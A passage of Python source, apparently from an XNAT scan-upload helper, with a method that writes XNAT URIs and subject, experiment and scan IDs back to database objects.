return {k: getattr(v, k) if getattr(v, k) else '' for k, v in {'xnat_subject_id': self.user,
'xnat_experiment_id': self.experiment}.items()}
# todo: the check for existence before reassigning the values is verbose. Decide whether its important.
    def _update_database_objects(self, objects=[], keywords=[], uris=[], ids=[]):
"""Update database objects
        After uploading a scan, ensures that user, experiment, and scan are updated in the database with their xnat uri
and xnat id.
:param list objects: user, experiment, and scan
:param list keywords: 'subject', 'experiment', and 'scan'
:param list uris: xnat uris
:param list ids: xnat ids
:return: None
"""
attributes = zip(objects, keywords, uris, ids)
for (obj, kw, uri, id) in attributes:
if not hasattr(obj, 'xnat_uri'):
obj.update({'xnat_uri': uri})
if not hasattr(obj,'xnat_{}_id'.format(kw)):
obj.update({'xnat_{}_id'.format(kw): id})
|